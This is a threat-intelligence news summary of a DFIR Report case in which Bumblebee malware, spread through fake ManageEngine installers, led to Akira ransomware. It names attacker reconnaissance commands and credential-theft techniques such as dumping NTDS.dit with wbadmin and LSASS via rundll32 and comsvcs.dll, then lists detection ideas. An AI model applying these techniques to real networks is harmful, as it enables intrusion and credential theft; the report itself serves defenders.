Bumblebee Malware Resurfaces in Campaigns to Deploy Akira Ransomware

Bumblebee malware has reemerged steadily, as evident in a new wave of intrusions tied to the deployment of Akira ransomware. In campaigns observed during May and July 2025, threat actors leveraged SEO poisoning tactics to impersonate legitimate IT software sites, including tools like “ManageEngine OpManager.” A detailed case analyzed by The DFIR Report in July 2025 involved a user downloading software from a fake site, ultimately executing a trojanized installer that deployed Bumblebee alongside the real application. "The intrusion quickly escalated from a single infected host to a full-scale network compromise," reports The DFIR Report, capturing the speed and severity of the compromise. Notably, the actor returned to the environment two days after the first ransomware deployment using their RustDesk remote access tools and encrypted additional systems, reflecting a growing trend of repeat exploitation and aggressive data destruction.

The attack began when a user searched for “ManageEngine OpManager” and was redirected to a malicious domain hosting a compromised installer. Execution of the MSI package initiated a dual process, installing the legitimate application while also loading Bumblebee via a malicious "msimg32.dll" file using "consent.exe." The malware contacted its command-and-control (C2) infrastructure through DGA-based domains. Roughly five hours later, a beacon was deployed, "AdgNsy.exe," part of the AdaptixC2 emulation tool. This beacon initiated a burst of internal reconnaissance using Windows binaries: "systeminfo," "nltest /dclist:," "whoami /groups," and "net group domain admins /dom." The actor then created two accounts, one of which was elevated to the "Enterprise Administrators" group, before using RDP to connect to a domain controller and dump the "NTDS.dit" file with "wbadmin.exe."

Persistence was established through the installation of the RustDesk remote access tool and the setup of an SSH tunnel to an external server. Network scanning continued via a renamed copy of SoftPerfect Network Scanner ("n.exe"), and credential access efforts expanded with a targeted dump of the Veeam PostgreSQL database. FileZilla was deployed on a file server to exfiltrate data over SFTP. Further credential theft was achieved by dumping LSASS memory using "rundll32.exe" with "comsvcs.dll." After data exfiltration and extensive reconnaissance, the Akira ransomware payload was deployed. The executable, "locker.exe," was run across multiple systems, targeting both local files and network shares. Two days later, the same actor returned via RustDesk, accessed a child domain controller, conducted additional discovery, including Invoke-ShareFinder and DNS zone exports, and deployed a second wave of ransomware across the child domain.

The attack chain detailed by The DFIR Report demonstrated a rapid and staged intrusion process that included privilege escalation, lateral movement, and multiple persistence mechanisms. Several behavioral-based correlation rules are shared, such as MSI-based installers leading to a burst of system reconnaissance, credential theft actions, and tools/processes used to move laterally. Another sequence to monitor is the creation of new accounts that are immediately used on another system. Lastly, monitoring the installation of remote access tools followed by SSH activity is recommended. The DFIR Report offered a detailed breakdown of detection and threat hunting opportunities to defend against the damaging and resurfacing attacks from Bumblebee malware.